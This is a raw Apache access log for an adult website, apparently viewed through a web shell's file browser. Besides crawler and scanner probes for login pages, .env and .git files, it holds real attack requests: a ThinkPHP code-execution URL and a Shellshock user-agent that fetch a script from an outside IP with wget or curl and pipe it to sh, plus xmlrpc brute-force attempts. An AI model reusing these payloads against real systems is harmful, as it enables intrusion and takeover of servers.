HEX
Server: Apache
System: Linux msm5694.mjhst.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User: camjab_ssh (1000)
PHP: 5.3.29
Disabled: NONE
Upload Files
File: //home/httpd/logs/lovelygays.com_access_log.4
216.180.246.168 - - [26/Jan/2026:04:06:03 -0500] "GET / HTTP/1.1" 200 55978 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.168 - - [26/Jan/2026:04:07:25 -0500] "GET / HTTP/1.1" 301 - "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.168 - - [26/Jan/2026:04:09:32 -0500] "GET /manage/account/login HTTP/1.1" 302 289 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
43.157.82.252 - - [26/Jan/2026:04:09:53 -0500] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
216.180.246.168 - - [26/Jan/2026:04:11:09 -0500] "GET /admin/index.html HTTP/1.1" 302 289 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.168 - - [26/Jan/2026:04:12:54 -0500] "GET /index.html HTTP/1.1" 302 289 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.168 - - [26/Jan/2026:04:14:40 -0500] "GET /+CSCOE+/logon.html HTTP/1.1" 302 289 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.168 - - [26/Jan/2026:04:17:07 -0500] "GET /cgi-bin/login.cgi HTTP/1.1" 302 289 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
204.76.203.212 - - [26/Jan/2026:04:17:14 -0500] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
216.180.246.168 - - [26/Jan/2026:04:19:16 -0500] "GET /login.htm HTTP/1.1" 302 289 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.168 - - [26/Jan/2026:04:21:08 -0500] "GET /login.html HTTP/1.1" 302 289 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.168 - - [26/Jan/2026:04:23:04 -0500] "GET /login.jsp HTTP/1.1" 302 289 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.168 - - [26/Jan/2026:04:25:03 -0500] "GET /login HTTP/1.1" 302 289 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.168 - - [26/Jan/2026:04:26:27 -0500] "GET /doc/index.html HTTP/1.1" 302 289 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.168 - - [26/Jan/2026:04:28:07 -0500] "GET /remote/login HTTP/1.1" 302 289 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.168 - - [26/Jan/2026:04:29:56 -0500] "GET //admin/login.asp HTTP/1.1" 302 289 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.168 - - [26/Jan/2026:04:31:57 -0500] "GET /web/ HTTP/1.1" 302 289 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.168 - - [26/Jan/2026:04:33:55 -0500] "GET //webpages/login.html HTTP/1.1" 302 289 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
204.76.203.212 - - [26/Jan/2026:04:44:46 -0500] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
193.142.147.209 - - [26/Jan/2026:04:48:25 -0500] "POST / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
117.55.202.152 - - [26/Jan/2026:04:49:26 -0500] "GET / HTTP/1.1" 301 - "-" "Python/3.12 aiohttp/3.13.3"
3.17.240.165 - - [26/Jan/2026:04:55:06 -0500] "GET / HTTP/1.1" 301 - "-" "Go-http-client/1.1"
34.61.133.254 - - [26/Jan/2026:04:57:56 -0500] "OPTIONS / HTTP/1.1" 301 - "-" "-"
124.225.206.172 - - [26/Jan/2026:05:00:23 -0500] "GET / HTTP/1.1" 200 55978 "-" "Python/3.8 aiohttp/3.9.5"
124.225.206.172 - - [26/Jan/2026:05:00:26 -0500] "GET / HTTP/1.1" 301 - "-" "Python/3.8 aiohttp/3.9.5"
43.157.170.13 - - [26/Jan/2026:05:08:53 -0500] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
204.76.203.212 - - [26/Jan/2026:05:09:28 -0500] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
110.249.201.64 - - [26/Jan/2026:05:09:43 -0500] "GET /robots.txt HTTP/1.1" 200 29 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
204.76.203.212 - - [26/Jan/2026:05:32:49 -0500] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
192.142.25.95 - - [26/Jan/2026:05:40:26 -0500] "GET / HTTP/1.1" 200 55978 "-" "-"
79.124.40.174 - - [26/Jan/2026:05:43:42 -0500] "POST / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
167.94.138.180 - - [26/Jan/2026:05:50:28 -0500] "GET /robots.txt HTTP/1.1" 200 29 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.180 - - [26/Jan/2026:05:50:29 -0500] "GET /2de_nmcsqt HTTP/1.1" 302 289 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
204.76.203.212 - - [26/Jan/2026:06:00:13 -0500] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
5.61.209.92 - - [26/Jan/2026:06:01:17 -0500] "GET /SDK/webLanguage HTTP/1.1" 302 289 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.153.183.127 - - [26/Jan/2026:06:25:57 -0500] "GET /.env HTTP/1.1" 302 289 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
204.76.203.212 - - [26/Jan/2026:06:26:02 -0500] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.153.183.127 - - [26/Jan/2026:06:27:11 -0500] "POST / HTTP/1.1" 301 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
192.159.99.95 - - [26/Jan/2026:06:33:59 -0500] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 302 289 "-" "Mozilla/5.0 (rondo2012@atomicmail.io)"
192.159.99.95 - - [26/Jan/2026:06:33:59 -0500] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=%28wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.dtm.sh%3F%3D%5C7eedeb11%7C%7Cbusybox%20wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.dtm.sh%3F%3D%5C7eedeb11%7C%7Ccurl%20-s%20http%3A%2F%2F41.231.37.153%2Frondo.dtm.sh%3F%3D%5C7eedeb11%29%7Csh HTTP/1.1" 301 - "-" "Mozilla/5.0 (rondo2012@atomicmail.io)"
192.159.99.95 - - [26/Jan/2026:06:33:59 -0500] "POST /index.php?s=captcha HTTP/1.1" 301 - "-" "Mozilla/5.0 (rondo2012@atomicmail.io)"
192.159.99.95 - - [26/Jan/2026:06:33:59 -0500] "GET / HTTP/1.1" 301 - "-" "() { :; }; /bin/bash -c \"(wget -qO- http://41.231.37.153/rondo.qre.sh?=\\7eedeb11||busybox wget -qO- http://41.231.37.153/rondo.qre.sh?=\\7eedeb11||curl -s http://41.231.37.153/rondo.qre.sh?=\\7eedeb11)|sh\"& # rondo2012@atomicmail.io"
60.16.222.168 - - [26/Jan/2026:06:39:12 -0500] "GET / HTTP/1.1" 301 - "-" "-"
175.30.48.205 - - [26/Jan/2026:06:40:05 -0500] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
142.93.93.42 - - [26/Jan/2026:06:43:29 -0500] "GET /.env HTTP/1.1" 302 289 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
142.93.93.42 - - [26/Jan/2026:06:43:30 -0500] "GET /.git/config HTTP/1.1" 302 289 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
93.174.93.12 - - [26/Jan/2026:06:45:30 -0500] "GET / HTTP/1.1" 200 55978 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7"
204.76.203.212 - - [26/Jan/2026:06:50:23 -0500] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
193.142.147.209 - - [26/Jan/2026:07:02:53 -0500] "POST / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
87.106.90.225 - - [26/Jan/2026:07:03:14 -0500] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
87.106.90.225 - - [26/Jan/2026:07:03:14 -0500] "GET / HTTP/1.1" 200 55978 "http://lovelygays.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
87.106.90.225 - - [26/Jan/2026:07:03:15 -0500] "GET /wp-json/wc/v3 HTTP/1.1" 302 290 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
87.106.90.225 - - [26/Jan/2026:07:03:16 -0500] "GET /magento_version HTTP/1.1" 302 290 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
87.106.90.225 - - [26/Jan/2026:07:03:16 -0500] "GET /index.php?route=checkout/cart HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
87.106.90.225 - - [26/Jan/2026:07:03:16 -0500] "GET /index.php?route=checkout/cart HTTP/1.1" 301 - "http://lovelygays.com/index.php?route=checkout/cart" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
87.106.90.225 - - [26/Jan/2026:07:03:16 -0500] "GET /?route=checkout/cart HTTP/1.1" 200 56022 "http://www.lovelygays.com/index.php?route=checkout/cart" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
87.106.90.225 - - [26/Jan/2026:07:03:17 -0500] "GET /wp-login.php?action=register HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
87.106.90.225 - - [26/Jan/2026:07:03:17 -0500] "GET /wp-login.php?action=register HTTP/1.1" 302 - "http://lovelygays.com/wp-login.php?action=register" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
87.106.90.225 - - [26/Jan/2026:07:03:18 -0500] "GET /wp-login.php?registration=disabled HTTP/1.1" 200 2342 "http://www.lovelygays.com/wp-login.php?action=register" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
204.76.203.212 - - [26/Jan/2026:07:13:23 -0500] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
192.159.99.169 - - [26/Jan/2026:07:18:13 -0500] "GET /.env HTTP/1.1" 302 289 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
192.159.99.169 - - [26/Jan/2026:07:18:13 -0500] "GET /wp-content/ HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
43.159.135.203 - - [26/Jan/2026:07:27:56 -0500] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
185.88.103.105 - - [26/Jan/2026:07:33:56 -0500] "GET /wp-login.php HTTP/1.1" 200 2282 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36"
185.88.103.105 - - [26/Jan/2026:07:33:56 -0500] "POST /xmlrpc.php HTTP/1.1" 302 294 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0"
185.81.144.12 - - [26/Jan/2026:07:33:57 -0500] "POST /xmlrpc.php HTTP/1.1" 302 294 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15"
213.232.121.103 - - [26/Jan/2026:07:33:57 -0500] "POST /xmlrpc.php HTTP/1.1" 302 294 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15"
176.126.104.151 - - [26/Jan/2026:07:33:58 -0500] "POST /xmlrpc.php HTTP/1.1" 302 294 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36"
157.22.72.176 - - [26/Jan/2026:07:33:59 -0500] "POST /xmlrpc.php HTTP/1.1" 302 294 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0"
83.97.117.253 - - [26/Jan/2026:07:34:00 -0500] "POST /xmlrpc.php HTTP/1.1" 302 294 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0"
155.212.38.203 - - [26/Jan/2026:07:34:01 -0500] "POST /xmlrpc.php HTTP/1.1" 302 294 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0"
155.212.37.179 - - [26/Jan/2026:07:34:07 -0500] "POST /xmlrpc.php HTTP/1.1" 302 294 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0"
45.140.204.48 - - [26/Jan/2026:07:34:08 -0500] "POST /xmlrpc.php HTTP/1.1" 302 294 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0"
185.61.216.163 - - [26/Jan/2026:07:34:08 -0500] "POST /xmlrpc.php HTTP/1.1" 302 294 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0"
185.96.37.14 - - [26/Jan/2026:07:34:09 -0500] "POST /xmlrpc.php HTTP/1.1" 302 294 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15"
185.88.103.105 - - [26/Jan/2026:07:34:10 -0500] "GET /wp-login.php?wp_lang=en_US HTTP/1.1" 200 2282 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36"
185.88.103.105 - - [26/Jan/2026:07:34:10 -0500] "POST /wp-login.php?wp_lang=en_US HTTP/1.1" 302 - "http://www.lovelygays.com/wp-login.php?wp_lang=en_US" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36"
185.88.103.105 - - [26/Jan/2026:07:34:11 -0500] "GET /wp-admin/ HTTP/1.1" 200 80852 "http://www.lovelygays.com/wp-login.php?wp_lang=en_US" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36"
185.88.103.105 - - [26/Jan/2026:07:34:12 -0500] "GET /wp-admin/admin-ajax.php?action=rest-nonce HTTP/1.1" 200 1 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36"
185.88.103.105 - - [26/Jan/2026:07:34:12 -0500] "GET /wp-admin/admin-ajax.php?action=rest-nonce HTTP/1.1" 200 1 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36"
185.88.103.105 - - [26/Jan/2026:07:34:13 -0500] "GET /wp-admin/admin-ajax.php?action=rest-nonce HTTP/1.1" 200 1 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.207 Safari/537.36"
103.118.47.243 - - [26/Jan/2026:07:37:16 -0500] "GET //wp-json/wp/v2/posts HTTP/1.1" 302 290 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
204.76.203.212 - - [26/Jan/2026:07:38:58 -0500] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
123.24.72.187 - - [26/Jan/2026:07:41:01 -0500] "GET /index.php/hardcore-bareback/gay-hardcore-tube.html HTTP/1.1" 200 25596 "-" "Mozilla/5.0 (Windows NT 6.1; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
43.130.16.212 - - [26/Jan/2026:07:47:41 -0500] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
131.0.35.132 - - [26/Jan/2026:07:56:12 -0500] "GET /index.php/horny-gays/rough-hardcore-gay-porn.html HTTP/1.1" 200 21636 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4886.148 Safari/537.36"
43.128.156.124 - - [26/Jan/2026:08:00:20 -0500] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.128.156.124 - - [26/Jan/2026:08:00:22 -0500] "GET / HTTP/1.1" 200 55978 "http://lovelygays.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
204.76.203.212 - - [26/Jan/2026:08:04:45 -0500] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.166.244.66 - - [26/Jan/2026:08:05:43 -0500] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
74.206.190.74 - - [26/Jan/2026:08:24:30 -0500] "POST /wp-cron.php?doing_wp_cron=1769433870.7914059162139892578125 HTTP/1.1" 200 - "-" "WordPress/3.6.1; http://www.lovelygays.com"
180.110.203.108 - - [26/Jan/2026:08:24:30 -0500] "GET / HTTP/1.1" 200 55978 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
204.76.203.212 - - [26/Jan/2026:08:31:07 -0500] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
216.180.246.206 - - [26/Jan/2026:08:44:01 -0500] "GET / HTTP/1.1" 200 55978 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.206 - - [26/Jan/2026:08:44:34 -0500] "GET / HTTP/1.1" 301 - "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.206 - - [26/Jan/2026:08:45:04 -0500] "GET /manage/account/login HTTP/1.1" 302 289 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.206 - - [26/Jan/2026:08:45:19 -0500] "GET /admin/index.html HTTP/1.1" 302 289 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.206 - - [26/Jan/2026:08:45:43 -0500] "GET /index.html HTTP/1.1" 302 289 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.206 - - [26/Jan/2026:08:45:58 -0500] "GET /+CSCOE+/logon.html HTTP/1.1" 302 289 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.206 - - [26/Jan/2026:08:46:12 -0500] "GET /cgi-bin/login.cgi HTTP/1.1" 302 289 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.206 - - [26/Jan/2026:08:46:27 -0500] "GET /login.htm HTTP/1.1" 302 289 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
110.249.201.210 - - [26/Jan/2026:08:46:37 -0500] "GET /robots.txt HTTP/1.1" 200 29 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
216.180.246.206 - - [26/Jan/2026:08:46:50 -0500] "GET /login.html HTTP/1.1" 302 289 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.206 - - [26/Jan/2026:08:47:05 -0500] "GET /login.jsp HTTP/1.1" 302 289 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.206 - - [26/Jan/2026:08:47:28 -0500] "GET /login HTTP/1.1" 302 289 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.206 - - [26/Jan/2026:08:47:51 -0500] "GET /doc/index.html HTTP/1.1" 302 289 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.206 - - [26/Jan/2026:08:48:11 -0500] "GET /remote/login HTTP/1.1" 302 289 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.206 - - [26/Jan/2026:08:48:34 -0500] "GET //admin/login.asp HTTP/1.1" 302 289 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.206 - - [26/Jan/2026:08:48:57 -0500] "GET /web/ HTTP/1.1" 302 289 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
216.180.246.206 - - [26/Jan/2026:08:49:22 -0500] "GET //webpages/login.html HTTP/1.1" 302 289 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
204.76.203.212 - - [26/Jan/2026:08:56:46 -0500] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
209.38.23.58 - - [26/Jan/2026:09:03:45 -0500] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
209.38.23.58 - - [26/Jan/2026:09:03:46 -0500] "GET /form.html HTTP/1.1" 302 289 "-" "curl/8.1.2"
209.38.23.58 - - [26/Jan/2026:09:03:47 -0500] "GET /upl.php HTTP/1.1" 302 289 "-" "Mozilla/5.0"
209.38.23.58 - - [26/Jan/2026:09:03:47 -0500] "GET /t4 HTTP/1.1" 302 289 "-" "Mozilla/5.0"
209.38.23.58 - - [26/Jan/2026:09:03:48 -0500] "GET /geoip/ HTTP/1.1" 302 289 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
209.38.23.58 - - [26/Jan/2026:09:03:49 -0500] "GET /1.php HTTP/1.1" 302 289 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
209.38.23.58 - - [26/Jan/2026:09:03:49 -0500] "GET /systembc/password.php HTTP/1.1" 302 289 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
209.38.23.58 - - [26/Jan/2026:09:03:50 -0500] "GET /password.php HTTP/1.1" 302 289 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
27.46.125.39 - - [26/Jan/2026:09:06:12 -0500] "GET /robots.txt HTTP/1.1" 200 29 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.3986.45 Safari/537.36 SE 2.X MetaSr 1.0"
43.135.145.117 - - [26/Jan/2026:09:06:54 -0500] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
